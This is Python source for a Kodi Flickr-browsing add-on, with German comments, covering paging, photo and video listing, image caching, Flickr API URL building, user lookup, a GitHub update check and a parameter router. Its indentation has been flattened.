maxPageContent = int(SETTINGS.getSetting('maxPageContent'))
if pagenr < 1:
pagenr = 1
pagenr = min(pagenr, pagemax)
PLog("Plugin: pagenr %d, maxPageContent %d, pagemax %d" % (pagenr, maxPageContent, pagemax))
# user_id ermitteln für home (PHT-Problem)
# Pfade ohne user_id möglich (z.B. Suche + Photostream aus Main)
try:
user_id = re.search(u'user_id=(\d+)@N0(\d+)', SEARCHPATH).group(0) #user_id=66956608@N06
user_id = user_id.split('=')[1]
except Exception as exception:
PLog(str(exception))
user_id = ''
# keine Suche - Bsp. = '#Gallery#'
if searchname.startswith('#') and searchname.endswith('#'):
searchname = searchname.replace('#', '')
title_org = searchname # Titel für ShowPhotoObject
searchname = L('Seite')
name = '%s %s/%s' % (searchname, pagenr, pagemax)
pagemax = int(pagemax)
if pagemax == 1: # nur 1 Seite -> SeparateVideos direkt
title = title + ' %s' % 1 # Bsp. "scott wilson Seite 1"
PLog('pagemax=1, jump to SeparateVideos')
li = SeparateVideos(title=title, path=SEARCHPATH, title_org=title_org)
return li
li = xbmcgui.ListItem()
li = home(li, user_id=user_id) # Home-Button
for i in range(pagemax):
title = L('Seite') + ': ' + str(pagenr)
# Anpassung SEARCHPATH an pagenr
path1 = SEARCHPATH.split('&page=')[0] # vor + nach page trennen
path2 = SEARCHPATH.split('&page=')[1]
pos = path2.find('&') # akt. pagenr abschneiden
path2 = path2[pos:]
path = path1 + '&page=%s' % str(pagenr) + path2 # Teil1 + Teil2 wieder verbinden
path = path + '&per_page=%s' % str(maxPageContent)
PLog('3Satz:')
PLog("i %d, pagenr %d" % (i, pagenr))
PLog(path); # PLog(path1); PLog(path2);
# SeparateVideos -> ShowPhotoObject, ShowVideos:
title=py2_encode(title); path=py2_encode(path);
title_org=py2_encode(title_org);
fparams="&fparams={'title': '%s', 'path': '%s', 'title_org': '%s'}" % (quote(title),
quote(path), quote(title_org))
addDir(li=li, label=title, action="dirList", dirID="SeparateVideos", fanart=R('icon-next.png'),
thumb=R('icon-next.png'), fparams=fparams)
pagenr = pagenr + 1
if i >= maxPageContent-1: # Limit Objekte pro Seite
break
if pagenr >= pagemax+1: # Limit Plugin-Seiten gesamt
break
# auf mehr prüfen:
# Begrenzung max/min s.o.
PLog('Mehr:')
PLog(pagenr); PLog(pagemax); PLog(maxPageContent);
tag = 'total: %s ' % pagemax + L('Seiten')
title_org=py2_encode(title_org); searchname=py2_encode(searchname); SEARCHPATH=py2_encode(SEARCHPATH)
if pagenr <= pagemax:
pagenr_next = pagenr
title = L('Mehr (+ 1)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_MEHR_1), thumb=R(ICON_MEHR_1),
fparams=fparams)
if pagenr + (9 * maxPageContent) <= pagemax:
pagenr_next = pagenr + (10 * maxPageContent)
title = L('Mehr (+ 10)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_MEHR_10), thumb=R(ICON_MEHR_10),
fparams=fparams)
if pagenr + (99 * maxPageContent) <= pagemax:
pagenr_next = pagenr + (100 * maxPageContent)
title = L('Mehr (+ 100)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_MEHR_100), thumb=R(ICON_MEHR_100),
fparams=fparams)
if pagenr + (499 * maxPageContent) <= pagemax:
pagenr_next = pagenr + (500 * maxPageContent)
title = L('Mehr (+ 500)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_MEHR_500), thumb=R(ICON_MEHR_500),
fparams=fparams)
# weniger
if pagenr-1 > maxPageContent: # maxPageContent = 1 Seite
pagenr_next = pagenr - ( 2* maxPageContent)
title = L('Weniger (- 1)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_WENIGER_1), thumb=R(ICON_WENIGER_1),
fparams=fparams)
if pagenr-1 > (10 * maxPageContent):
pagenr_next = pagenr - (10 * maxPageContent)
title = L('Weniger (- 10)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_WENIGER_10), thumb=R(ICON_WENIGER_10),
fparams=fparams)
if pagenr-1 > 100:
pagenr_next = pagenr - (100 * maxPageContent)
title = L('Weniger (- 100)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_WENIGER_100), thumb=R(ICON_WENIGER_100),
fparams=fparams)
if pagenr-1 > 500:
pagenr_next = pagenr - (500 * maxPageContent)
title = L('Weniger (- 500)')
fparams="&fparams={'title': '%s', 'searchname': '%s', 'SEARCHPATH': '%s', 'pagemax': '%s', 'pagenr': '%s'}" %\
(quote(title_org), quote(searchname), quote(SEARCHPATH), pagemax, pagenr_next)
addDir(li=li, label=title_org, action="dirList", dirID="BuildPages", fanart=R(ICON_WENIGER_500), thumb=R(ICON_WENIGER_500),
fparams=fparams)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#----------------------------------------------------------------
# SeparateVideos: Aufruf durch BuildPages falls SETTINGS.getSetting('showVideos') gewählt
# - 2 Buttons, falls die Seite (path) sowohl Videos als auch Fotos enthält.
# andernfalls wird direkt zu ShowPhotoObject oder ShowVideos verzweigt
# (Seite wird aus dem Cache erneut geladen)
# - user_id,username,realname werden hier ermittelt + übergeben
def SeparateVideos(title, path, title_org):
PLog('SeparateVideos: ' + path)
li = xbmcgui.ListItem()
page, msg = RequestUrl(CallerName='SeparateVideos', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
PLog(page[:100]) # Ergebnis im XML-Format, hier in strings verarbeitet
# Rückwärtssuche: user_id -> username + realname
# 1. user_id aus path ermitteln, 2. Aufruf flickr.people.getInfo
# nur falls user_id bekannt - nicht bei den Publics (müsste via nsid bei
# jedem Satz ermittelt werden - zu zeitaufwendig bei 100 Sätzen)
# Pfade ohne user_id möglich (z.B. Suche + Photostream aus Main)
try:
user_id = re.search(u'user_id=(\d+)@N0(\d+)', path).group(0) #user_id=66956608@N06
user_id = user_id.split('=')[1]
except Exception as exception:
PLog(str(exception))
user_id = ''
username=''; realname='';
if user_id and ('None' not in user_id): # 'None' = PHT-Dummy
user_id,nsid,username,realname = GetUserID(user_id) # User-Profil laden
PLog('user_id %s, username %s, realname %s' % (user_id,username,realname))
if SETTINGS.getSetting('showVideos') == 'false': # keine Videos zeigen
ShowPhotoObject(title,path,user_id,username,realname,title_org) # direkt
return
if 'media="video"' in page and 'media="photo"' in page: # Auswahlbuttons für Fotos + Videos zeigen
# title von BuildPages
title=py2_encode(title); path=py2_encode(path); username=py2_encode(username);
realname=py2_encode(realname); title_org=py2_encode(title_org);
fparams="&fparams={'title': '%s', 'path': '%s', 'user_id': '%s', 'username': '%s', 'realname': '%s', 'title_org': '%s'}" %\
(quote(title), quote(path), user_id, quote(username), quote(realname), quote(title_org))
addDir(li=li, label=title, action="dirList", dirID="ShowPhotoObject", fanart=R('icon-photo.png'),
thumb=R('icon-photo.png'), fparams=fparams)
title = L("zeige Videos")
fparams="&fparams={'title': '%s', 'path': '%s', 'user_id': '%s', 'username': '%s', 'realname': '%s'}" %\
(quote(title), quote(path), user_id, quote(username), quote(realname))
addDir(li=li, label=title, action="dirList", dirID="ShowVideos", fanart=R('icon-video.png'),
thumb=R('icon-video.png'), fparams=fparams)
else:
if 'media="video"' in page: # nur Videos
ShowVideos(title,path,user_id,username,realname) # direkt
else: # nur Fotos
ShowPhotoObject(title,path,user_id,username,realname,title_org) # direkt
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#----------------------------------------------------------------
# Aufrufer: BuildPages -> SeparateVideos
# path muss die passende pagenr enthalten
#
# Anders als beim Photo-Objekt in Plex werden die Bilder hier
# in SLIDESTORE gespeichert und als Listitem gelistet
# (Button -> Einzelbild).
# Ein abschließender Button ruft die Slideshow auf (Kodi-
# Player).
#
# Überwachung Speicherplatz: CheckStorage - s.u.
# eindeutiger Verz.-Namen: path2dirname - s.u.
#
# Hinw.: bei wiederholten Aufrufen einer Quelle sammeln sich im Slide-Verz.
# mehr Bilder als bei Flickr (insbes. Photostream wird häufig aktualisiert) -
# es erfolgt kein Abgleich durch das Addon. Alle Bilder in einem Verz.
# verbleiben bis zum Löschen durch CheckStorage oder CleanUp.
#
def ShowPhotoObject(title,path,user_id,username,realname,title_org):
PLog('ShowPhotoObject:')
PLog(title); PLog(title_org)
page, msg = RequestUrl(CallerName='ShowPhotoObject', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
PLog(page[:100]) # Ergebnis im XML-Format, hier in strings verarbeitet
pagenr = stringextract('page="', '"', page)
li = xbmcgui.ListItem()
li = home(li, user_id=user_id, username=username) # Home-Button
records = blockextract('<photo id', '', page) # ShowPhotoObject: nur '<photo id'-Blöcke zulässig
PLog('records: %s' % str(len(records)))
extras_list = Dict('load', 'extras_list')
try: # Back in Browser: ValueError: list.remove(x)
extras_list.remove('media') # 1. Eintrag media enthält keinen URL
except:
pass
PLog("extras_list: " + str(extras_list)); # Größen s. BuildExtras
CheckStorage(SLIDESTORE, SETTINGS.getSetting('max_slide_store')) # Limit checken
title = path2dirname(title, path, title_org) # Verz.-Namen erzeugen
fname = make_filenames(py2_decode(title)) # os-konforme Behandl.
PLog(fname);
fpath = '%s/%s' % (SLIDESTORE, fname)
PLog(fpath)
if os.path.isdir(fpath) == False:
try:
os.mkdir(fpath)
except OSError:
msg1 = L('Bildverzeichnis im SLIDESTORE konnte nicht erzeugt werden:')
msg2 = fname
msg3 = "SLIDESTORE: %s" % (SLIDESTORE)
PLog(msg1); PLog(msg2); PLog(msg3)
MyDialog(msg1, msg2, msg3)
return li
image = 0
for s in records:
if 'media="video"' in s:
continue
pid = stringextract('photo id=\"', '\"', s) # photo id auch bei Videos
owner = stringextract('owner=\"', '\"', s)
secret = stringextract('secret=\"', '\"', s)
serverid = stringextract('server=\"', '\"', s)
farmid = stringextract('farm=\"', '\"', s)
descr = stringextract('title=\"', '\"', s) # Zusatz zu Bild 001
descr = unescape(descr)
if username: # Ersatz owner durch username + realname
owner = username
if realname:
owner = "%s | %s" % (owner, realname)
# Url-Format: https://www.flickr.com/services/api/misc.urls.html
thumb_src = 'https://farm%s.staticflickr.com/%s/%s_%s_m.jpg' % (farmid, serverid, pid, secret) # m=small (240)
# Foto-Auswahl - jeweils das größte, je nach Voreinstellung (falls verfügbar):
Imagesize = L('Bildgroesse')
Imagesize = py2_decode(Imagesize)
if 'url_' in s: # Favs ohne Url
for i in range (len(extras_list)):
url_extra = extras_list[i]
img_src = stringextract('%s=\"' % (url_extra), '\"', s)
suffix = url_extra[-2:] # z.B. _o von url_o, zusätzlich height + width ermitteln
width = stringextract('width%s=\"' % (suffix), '\"', s) # z.B. width_o
height = stringextract('height%s=\"' % (suffix), '\"', s) # z.B. height_o
# PLog(url_extra); PLog(img_src);PLog(suffix);PLog(width);PLog(height); # bei Bedarf
if len(img_src) > 0: # falls Format nicht vorhanden, weiter mit den kleineren Formaten
PLog("url_extra: " + url_extra)
break
summ = owner + ' | ' + '%s: %s x %s' % (Imagesize, width, height)
else: # Favs-Url wie thumb_src ohne extra (m)
img_src = 'https://farm%s.staticflickr.com/%s/%s_%s.jpg' % (farmid, serverid, pid, secret)
summ = owner # falls ohne Größenangabe
# für Originalbilder in Alben zusätzl. getSizes-Call erforderlich:
PLog('Mark0')
if "photosets.getPhotos" in path: # Output ohne Url-Liste für Größen
if SETTINGS.getSetting('max_width') == "Originalbild":
PLog('try_info_call:')
API_KEY = GetKey()
p1 = "https://www.flickr.com/services/rest/?method=flickr.photos.getSizes&api_key=%s" % API_KEY
p2 = "&photo_id=%s&format=rest" % (pid)
info_url = p1 + p2
page, msg = RequestUrl(CallerName='ShowPhotoObject2', url=info_url)
if page:
sizes = blockextract('<size label', '', page)
source=''
for size in sizes:
if '"Original"' in size:
width = stringextract('width="', '"', s) # z.B. "1600"
height = stringextract('height="', '"', s) # z.B. "1200"
source = stringextract('source="', '"', s)
break
else: # Original kann fehlen, letzte Zeile auswerten (aufsteigend sort.)
width = stringextract('width="', '"', sizes[-1]) # z.B. "3968"
height = stringextract('height="', '"', sizes[-1]) # z.B. "2907"
source = stringextract('source="', '"', sizes[-1])
if source:
img_src = source
summ = owner + ' | ' + '%s: %s x %s' % (Imagesize, width, height)
PLog(descr); PLog(img_src); # PLog(thumb_src); PLog(pid);PLog(owner); # bei Bedarf
if img_src == '': # Sicherung
msg1 = 'Problem in Bildgalerie: Bild nicht gefunden'
PLog(msg1)
if img_src:
# Kodi braucht Endung für SildeShow; akzeptiert auch Endungen, die
# nicht zum Imageformat passen
pic_name = 'Bild_%04d_%s.jpg' % (image+1, pid) # Name: Bild + Nr + pid
local_path = "%s/%s" % (fpath, pic_name)
PLog("local_path: " + local_path)
title = "Bild %03d | %s" % (image+1, descr)
PLog("Bildtitel: " + title)
thumb = img_src # Default: Bild = Url
local_path = os.path.abspath(local_path)
if os.path.isfile(local_path) == False: # nicht lokal vorhanden - get & store
# 03.10.2019 urlretrieve in Schleife bremst sehr stark - daher Ausführung im Hintergrund
#try:
#urllib.urlretrieve(img_src, local_path)
background_thread = Thread(target=thread_getpic, args=(img_src, local_path))
background_thread.start()
thumb = local_path
#except Exception as exception:
# PLog(str(exception))
else:
thumb = local_path # lokal vorhanden - load
thumb_src = thumb # Verzicht auf thumbnail von Farm
tagline = unescape(title_org); tagline = cleanhtml(tagline)
summ = unescape(summ)
PLog('neu:');PLog(title);PLog(thumb);PLog(thumb_src);PLog(summ); PLog(local_path);
if thumb:
# via addDir ist keine Steuerung mittels Cursortasten im Listing möglich.
# Daher verwenden wir für jedes Bild ein eigenes Listitem.
#fparams="&fparams={'path': '%s', 'single': 'True'}" % urllib2.quote(local_path)
#addDir(li=li, label=title, action="dirList", dirID="SlideShow",
# fanart=thumb, thumb=thumb, fparams=fparams, summary=summ, tagline=tagline)
image += 1
PLog("thumb_src: " + thumb_src)
li = xbmcgui.ListItem()
li.setLabel(title)
# 11.04.2020 setThumbnailImage ersetzt durch setArt
li.setArt({'thumb':thumb_src, 'icon':thumb_src}) # lokal oder Farm
li.setInfo(type='image', infoLabels={'Title': title}) # plot bei image nicht möglich
xbmcplugin.addDirectoryItem(
handle=HANDLE,
url=thumb, # lokal oder Farm
listitem=li,
isFolder=False
)
# Button SlideShow - auch via Kontextmenü am Bild
if image > 0:
fpath=py2_encode(fpath);
fparams="&fparams={'path': '%s'}" % quote(fpath) # fpath: SLIDESTORE/fname
addDir(li=li, label="SlideShow", action="dirList", dirID="SlideShow",
fanart=R('icon-stream.png'), thumb=R('icon-stream.png'), fparams=fparams)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True) # ohne Cache, um Neuladen zu verhindern
#----------------------------------------------------------------
def thread_getpic(img_src, local_path):
PLog("thread_getpic:")
PLog(img_src); PLog(local_path);
try:
urlretrieve(img_src, local_path)
except Exception as exception:
PLog("thread_getpic:" + str(exception))
return
#----------------------------------------------------------------
# Aufruf ShowPhotoObject
# erzeugt eindeutigen Verz.-Namen aus title_org, Titel + Pfad, Bsp.:
# show_photos_158655533 Photostream 1-seitig, vorgewählter User
# show_photos_72157708806994797 Photostream 1-seitig, anderer User
# Photostream_Page-_1 Photostream allgmein, Seite 1
# Photostream_show_photos_158655 Photostream mehrseitig, vorgewählter User
# Photostream_show_photos_1 Photostream mehrseitig, Seite mit Video(s),
# Aufruf durch SeparateVideos
def path2dirname(title, path, title_org):
PLog('path2dirname: ' + path)
PLog(title); PLog(title_org);
dirname=''; dir_id=''
if 'id=' in path: # photoset_id, gallery_id
try:
dir_id = re.search('id=(\d+)',path).group(1)
except Exception as exception:
PLog(str(exception))
dir_id=''
pagenr=''
if title.startswith('Page') == False: # Zusatz pagenr, falls nicht im Titel
if '&page=' in path:
try:
pagenr = re.search('&page=(\d+)', path).group(1)
except Exception as exception: # nr kann fehlen (..&text=&..)
PLog(str(exception))
pagenr=''
dirname = "%s_%s" % (title_org, title) # title_org: Photostream o.ä.
if dir_id:
dirname = "%s_%s" % (dirname, dir_id)
if pagenr:
dirname = "%s_%s" % (dirname, pagenr)
PLog(dirname)
return dirname
#----------------------------------------------------------------
# Darstellung der in SLIDESTORE gespeicherten Bilder.
# single=None -> Einzelbild
# single=True -> SlideShow
#
# ClearUp in SLIDESTORE s. Modulkopf
#
def SlideShow(path, single=None):
PLog('SlideShow: ' + path)
local_path = os.path.abspath(path)
if single: # Einzelbild
return xbmc.executebuiltin('ShowPicture(%s)' % local_path)
else:
PLog(local_path)
return xbmc.executebuiltin('SlideShow(%s, %s)' % (local_path, 'notrandom'))
#----------------------------------------------------------------
# Rückgabe path: xml-Format
def ShowVideos(title,path,user_id,username,realname):
PLog('ShowVideos:')
# PLog(path)
page, msg = RequestUrl(CallerName='ShowVideos', url=path)
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
PLog(page[:100]) # Ergebnis im XML-Format, hier in strings verarbeitet
li = xbmcgui.ListItem()
li = home(li, user_id=user_id, username=username) # Home-Button
records = blockextract('<photo id', '', page)
PLog('records: %s' % str(len(records)))
i=0
for s in records:
if 'media="video"' not in s: # Sicherung (sollte hier nicht vorkommen)
continue
i=i+1
pid = stringextract('id=\"', '\"', s)
owner = stringextract('owner=\"', '\"', s)
secret = stringextract('secret=\"', '\"', s)
serverid = stringextract('server=\"', '\"', s)
farmid = stringextract('farm=\"', '\"', s)
title = stringextract('title=\"', '\"', s)
url = 'https://www.flickr.com/video_download.gne?id=%s' % pid
# gewünschte Bildgröße hier nicht relevant, z=kleinste reicht für Video-Thumb
img_src = stringextract('url_z="', '"', s)
title = unescape(title) # Web Client hat Probleme mit ausländ. Zeichen
if title == '':
title = "Video %s" % str(i)
else:
"Video %s| %s" % (str(i), title)
summ = owner
PLog('4Satz:')
PLog(title); PLog(pid); PLog(img_src); PLog(url);
url=py2_encode(url); title=py2_encode(title); img_src=py2_encode(img_src); summ=py2_encode(summ);
fparams="&fparams={'url': '%s', 'title': '%s', 'thumb': '%s', 'Plot': '%s', 'sub_path': '', 'Merk': ''}" %\
(quote(url), quote(title), quote(img_src), quote_plus(summ))
addDir(li=li, label=title, action="dirList", dirID="PlayVideo", fanart=img_src, thumb=img_src, fparams=fparams,
summary=summ)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=True)
#----------------------------------------------------------------
# method: Flickr-API-Methode
# pagenr muss Aufrufer beisteuern
def BuildPath(method, query_flickr, user_id, pagenr, photoset_id=''):
PLog('BuildPath: %s' % method)
PLog(user_id);
query_flickr = unquote(query_flickr)
PLog(query_flickr);
API_KEY = GetKey() # flickr_keys.txt
PATH = "https://api.flickr.com/services/rest/?method=%s&api_key=%s" % (method, API_KEY)
if user_id: # None bei allg. Suche
if 'None' not in user_id: # PHT-Dummy
# user_id = Dict('load', 'nsid') # beliebige user_id aus FlickrPeople
PATH = PATH + "&user_id=%s" % (user_id)
# Suchstring + Extras anfügen für Fotoabgleich -
# s. https://www.flickr.com/services/api/flickr.photos.search.html
if 'photos.search' in method or 'favorites.getList' in method or 'photosets' in method or 'galleries.getPhotos' in method:
extras = BuildExtras() # einschl. Dict['extras_list'] für Fotoabgleich
if query_flickr.startswith('&') and query_flickr.endswith('&'): # von MyPhotostream / MyFaves
query_flickr = '' # alle listen
if 'photosets.getList' in method: # primary_photo_extras statt extras
PATH = PATH + "&text=%s&page=%s&primary_photo_extras=%s&format=rest" % (query_flickr, pagenr, extras)
if 'photosets.getPhotos' in method: # primary_photo_extras statt extras
PATH = PATH + "&photoset_id=%s&page=%s&primary_photo_extras=%s&format=rest" % (photoset_id, pagenr, extras)
else:
query_flickr = quote(query_flickr)
PATH = PATH + "&text=%s&page=%s&extras=%s&format=rest" % (query_flickr, pagenr, extras)
if SETTINGS.getSetting('sort_order'): # Bsp. 1 / date-posted-desc
val = SETTINGS.getSetting('sort_order')
nr = val.split('/')[0].strip
sortorder = val.split('/')[1].strip()
PLog(type(PATH));PLog(type(sortorder));
PATH = '%s&sort=%s' % (PATH, py2_encode(sortorder))
if pagenr:
PATH = PATH + "&page=%s" % pagenr
# per_page muss an letzter Stelle stehen (Änderung in BuildPages möglich)
if SETTINGS.getSetting('maxPageContent'): # Objekte pro Seite
mPC = py2_encode(SETTINGS.getSetting('maxPageContent'))
PATH = PATH + "&per_page=%s" % mPC
else:
PATH = PATH + "&per_page=%s" % 500 # API: Maximum
PLog(PATH)
return PATH
#----------------------------------------------------------------
def GetKey():
API_KEY = RLoad('flickr_keys.txt')
API_KEY = API_KEY.strip()
PLog('flickr_keys.txt geladen')
return API_KEY
#----------------------------------------------------------------
# Aufruf: MyMenu
# 3 Methoden: Suche nach user_id, Email, Username
def GetUserID(user):
PLog('GetUserID:'); PLog(str(user))
API_KEY = GetKey()
if '@' in user:
if '@N' in user: # user_id (nsid)
nsid_url = 'https://api.flickr.com/services/rest/?method=flickr.people.getInfo'
nsid_url = nsid_url + '&user_id=%s' % user
else: # Email
nsid_url = 'https://api.flickr.com/services/rest/?method=flickr.people.findByEmail'
nsid_url = nsid_url + '&find_email=%s' % user
url = nsid_url + '&api_key=%s' % API_KEY
else:
nsid_url = 'https://api.flickr.com/services/rest/?method=flickr.people.findByUsername'
url = nsid_url + '&api_key=%s&username=%s' % (API_KEY, user)
page, msg = RequestUrl(CallerName='MyMenu: get nsid', url=url)
PLog(page[:100])
if page == '':
msg1 = msg
MyDialog(msg1, '', '')
return
if 'User not found' in page: # Flickr err code
user_id = 'User not found'
else:
user_id = stringextract('id="', '"', page) # user_id / nsid i.d.R. identisch
nsid = stringextract('nsid="', '"', page)
username = stringextract('<username>', '</username>', page)
realname = stringextract('<realname>', '</realname>', page)
# Dict['user_id'] = user_id # Dicts nur für Flickr user (s. Mymenu)
return user_id,nsid,username,realname
#----------------------------------------------------------------
def BuildExtras(): # Url-Parameter für Bildgrößen - abh. von Einstellungen
# URL-Anforderung, sortiert von groß nach klein - Default
# media: Ausgabe photo oder video
extras = "media,url_o,url_k,url_h,url_l,url_c,url_z"
# Breiten: o = Original, k=2048, h=1600, l=1024, c=800, z=640
pref_max_width = SETTINGS.getSetting('max_width')
# pref_max_width = 1600 # Test
if pref_max_width == "Originalbild":
extras = "media,url_o,url_k,url_h,url_l,url_c,url_z"
if pref_max_width == "2048":
extras = "media,url_k,url_h,url_l,url_c,url_z"
if pref_max_width == "1600":
extras = "media,url_h,url_l,url_c,url_z"
if pref_max_width == "1024":
extras = "media,url_l,url_c,url_z"
if pref_max_width == "800":
extras = "media,url_c,url_z"
if pref_max_width == "640":
extras = "media,url_z"
PLog(pref_max_width); PLog(extras)
extras_list = extras.split(",") # Für Foto-Auswahl in Suchergebnis
Dict('store', 'extras_list', extras_list)
return extras
####################################################################################################
def SearchUpdate(title):
PLog('SearchUpdate:')
li = xbmcgui.ListItem()
ret = updater.update_available(VERSION)
#PLog(ret)
if ret[0] == False:
msg1 = 'Updater: Github-Problem'
msg2 = 'update_available: False'
PLog("%s | %s" % (msg1, msg2))
MyDialog(msg1, msg2, '')
return li
int_lv = ret[0] # Version Github
int_lc = ret[1] # Version aktuell
latest_version = ret[2] # Version Github, Format 1.4.1
summ = ret[3] # Changes
tag = ret[4] # tag, Bsp. 029
# Bsp.: https://github.com/rols1/Kodi-Addon-ARDundZDF/releases/download/0.5.4/Kodi-Addon-FlickrExplorer.zip
url = 'https://github.com/{0}/releases/download/{1}/{2}.zip'.format(GITHUB_REPOSITORY, latest_version, REPO_NAME)
PLog(int_lv); PLog(int_lc); PLog(latest_version); PLog(summ); PLog(url);
if int_lv > int_lc: # zum Testen drehen (akt. Addon vorher sichern!)
title = 'Update vorhanden - jetzt installieren'
summary = 'Addon aktuell: ' + VERSION + ', neu auf Github: ' + latest_version
tagline = cleanhtml(summ)
thumb = R(ICON_UPDATER_NEW)
url=py2_encode(url);
fparams="&fparams={'url': '%s', 'ver': '%s'}" % (quote_plus(url), latest_version)
addDir(li=li, label=title, action="dirList", dirID="resources.lib.updater.update",
fanart=R(ICON_UPDATER_NEW), thumb=R(ICON_UPDATER_NEW), fparams=fparams, summary=summary,
tagline=cleanhtml(summ))
title = 'Update abbrechen'
summary = 'weiter im aktuellen Addon'
thumb = R(ICON_UPDATER_NEW)
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Main", fanart=R(ICON_UPDATER_NEW),
thumb=R(ICON_UPDATER_NEW), fparams=fparams, summary=summary)
else:
title = 'Addon ist aktuell | weiter zum aktuellen Addon'
summary = 'Addon Version ' + VERSION + ' ist aktuell (kein Update vorhanden)'
summ = summ.splitlines()[0] # nur 1. Zeile changelog
tagline = "%s | Mehr in changelog.txt" % summ
thumb = R(ICON_OK)
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Main", fanart=R(ICON_OK),
thumb=R(ICON_OK), fparams=fparams, summary=summary, tagline=tagline)
xbmcplugin.endOfDirectory(HANDLE, cacheToDisc=False)
####################################################################################################
# Hilfsfunktonen - für Kodiversion augelagert in Modul util_flickr.py
#----------------------------------------------------------------
def router(paramstring):
# paramstring: Dictionary mit
# {<parameter>: <value>} Elementen
paramstring = unquote_plus(paramstring)
PLog(' router_params1: ' + paramstring)
PLog(type(paramstring));
if paramstring:
params = dict(parse_qs(paramstring[1:]))
PLog(' router_params_dict: ' + str(params))
try:
if 'content_type' in params:
if params['content_type'] == 'video': # Auswahl im Addon-Menü
Main()
PLog('router action: ' + params['action'][0]) # hier immer action="dirList"
PLog('router dirID: ' + params['dirID'][0])
PLog('router fparams: ' + params['fparams'][0])
except Exception as exception:
PLog(str(exception))
if params['action'][0] == 'dirList': # Aufruf Directory-Listing
newfunc = params['dirID'][0]
func_pars = params['fparams'][0]
# Funktionsaufrufe + Parameterübergabe via Var's
# s. 00_Migration_PLEXtoKodi.txt
# Modulpfad immer ab resources - nicht verkürzen.
if '.' in newfunc: # Funktion im Modul, Bsp.:
l = newfunc.split('.') # Bsp. resources.lib.updater.update
PLog(l)
newfunc = l[-1:][0] # Bsp. updater
dest_modul = '.'.join(l[:-1])
PLog(' router dest_modul: ' + str(dest_modul))
PLog(' router newfunc: ' + str(newfunc))
try:
func = getattr(sys.modules[dest_modul], newfunc)
except Exception as exception:
PLog(str(exception))
func = ''
if func == '': # Modul nicht geladen - sollte nicht
li = xbmcgui.ListItem() # vorkommen - s. Addon-Start
msg1 = "Modul %s ist nicht geladen" % dest_modul
msg2 = "Ursache unbekannt."
PLog(msg1)
MyDialog(msg1, msg2, '')
xbmcplugin.endOfDirectory(HANDLE)
else:
func = getattr(sys.modules[__name__], newfunc) # Funktion im Haupt-PRG OK
PLog(' router func_getattr: ' + str(func))
if func_pars != '""': # leer, ohne Parameter?
# PLog(' router func_pars: Ruf mit func_pars')
# func_pars = unquote_plus(func_pars) # quotierte url auspacken - entf.
PLog(' router func_pars unquote_plus: ' + str(func_pars))
try:
# Problem (spez. Windows): Parameter mit Escapezeichen (Windows-Pfade) müssen mit \\
# behandelt werden und werden dadurch zu unicode-Strings. Diese benötigen in den
# Funktionen eine UtfToStr-Behandlung.
# Keine /n verwenden (json.loads: need more than 1 value to unpack)
func_pars = func_pars.replace("'", "\"") # json.loads-kompatible string-Rahmen
func_pars = func_pars.replace('\\', '\\\\') # json.loads-kompatible Windows-Pfade
PLog("json.loads func_pars: " + func_pars)
PLog('json.loads func_pars type: ' + str(type(func_pars)))
mydict = json.loads(func_pars)
PLog("mydict: " + str(mydict)); PLog(type(mydict))
except Exception as exception:
PLog('router_exception: {0}'.format(str(exception)))
mydict = ''
# PLog(' router func_pars: ' + str(type(mydict)))
if 'dict' in str(type(mydict)): # Url-Parameter liegen bereits als dict vor
mydict = mydict
else:
mydict = dict((k.strip(), v.strip()) for k,v in (item.split('=') for item in func_pars.split(',')))
PLog(' router func_pars: mydict: %s' % str(mydict))
func(**mydict)
else:
func()
else:
PLog('router action-params: ?')
else:
# Plugin-Aufruf ohne Parameter
Main()
#----------------------------------------------------------------
PLog('Addon_URL: ' + PLUGIN_URL) # sys.argv[0], plugin://plugin.image.flickrexplorer/
PLog('ADDON_ID: ' + ADDON_ID); PLog(SETTINGS); PLog(ADDON_NAME);PLog(SETTINGS_LOC);
PLog(ADDON_PATH);PLog(ADDON_VERSION);
PLog('HANDLE: ' + str(HANDLE))
